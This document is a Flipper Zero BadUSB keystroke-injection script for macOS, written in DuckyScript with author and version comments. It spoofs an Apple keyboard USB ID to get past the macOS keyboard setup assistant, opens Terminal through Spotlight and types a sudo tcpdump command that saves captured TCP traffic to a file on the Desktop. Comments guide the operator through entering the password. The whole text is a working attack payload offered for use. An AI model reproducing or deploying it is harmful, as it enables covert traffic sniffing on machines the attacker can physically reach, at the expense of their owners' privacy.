ID 05ac:021e Apple:Keyboard REM Keep these 3 lines IF (and only if) it's the first time you are performing a badKB attack against a specific macOS target. REM In fact, it helps Flipper Zero bypass the macOS keyboard setup assistant. Otherwise the attack will not start. REM Author: 47LeCoste REM Version 1.0 (Flipper Ducky) REM Target: macOS DELAY 3000 F4 DELAY 1000 STRING Terminal DELAY 200 ENTER DELAY 1000 STRING sudo tcpdump -i en1 -n tcp > ~/Desktop/sniff_output.txt DELAY 500 ENTER REM `en0` is for Ethernet, `en1` is for Wi-Fi. REM At this point you have to insert your password, press ENTER and the sniff will start saving the result into a file on the Desktop `sniff_output.txt`. REM It will seems like you are typing nothing, but if you type the correct password, it will start.